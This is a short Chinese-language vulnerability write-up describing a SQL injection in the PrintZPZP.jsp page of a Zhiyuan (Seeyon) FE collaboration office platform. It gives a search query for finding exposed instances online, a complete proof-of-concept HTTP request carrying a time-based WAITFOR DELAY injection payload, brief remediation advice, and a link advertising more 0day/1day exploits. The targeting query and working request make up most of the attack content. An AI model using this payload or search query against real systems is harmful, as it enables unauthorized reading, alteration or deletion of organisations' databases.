》》》产品描述《《《
致远互联智能协同是一个信息窗口与工作界面,进行所有信息的分类组合和聚合推送呈现。通过面向角色化、业务化、多终端的多维信息空间设计,为不同组织提供协同门户,打破组织内信息壁垒,构建统一协同沟通的平台。
》》》漏洞描述《《《
致远互联 FE协作办公平台 PrintZPzP,jsp 存在一个 SQL 注入Q漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性,
》》》搜索语句《《《
title="FE协作办公平台" || body="li_plugins_download"
》》》漏洞复现《《《
POC
GET /kp/PrintZPZP.jsp?zpshqid=1';WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; SE 2.X MetaSr 1.0)
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
》》》修复建议《《《
1、如非必要,禁止公网访问该系统。
2、用防火墙等安全设备设定访问规则,只允许白名单中的设备访问。
3、及时升级产品到最新版本。
-------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------
更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)
-------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------
